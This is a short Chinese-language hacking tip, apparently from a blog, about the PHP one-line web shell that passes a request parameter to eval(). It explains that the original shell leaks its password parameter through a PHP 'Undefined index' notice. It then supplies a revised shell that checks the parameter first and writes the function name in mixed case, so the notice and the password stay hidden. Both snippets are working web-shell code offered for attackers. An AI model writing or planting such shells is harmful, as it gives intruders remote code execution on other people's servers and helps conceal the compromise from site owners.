看下面一个例子:
一句话:<?php eval($_REQUEST['o']);?>
在浏览器直接URL过去,出现:
Notice: Undefined index: o in C:\phpStudy\WWW\shell.php on line 1
这样密码一下就暴露了,无论多么复杂,所以应该去正常浏览器检查这个URL,看他是不是产生这个Notice
有,怎么办,在写一句话时需要如下语句:
<?php
!empty($_REQUEST['o'])?eVaL($_REQUEST['o']):false
?>
即可
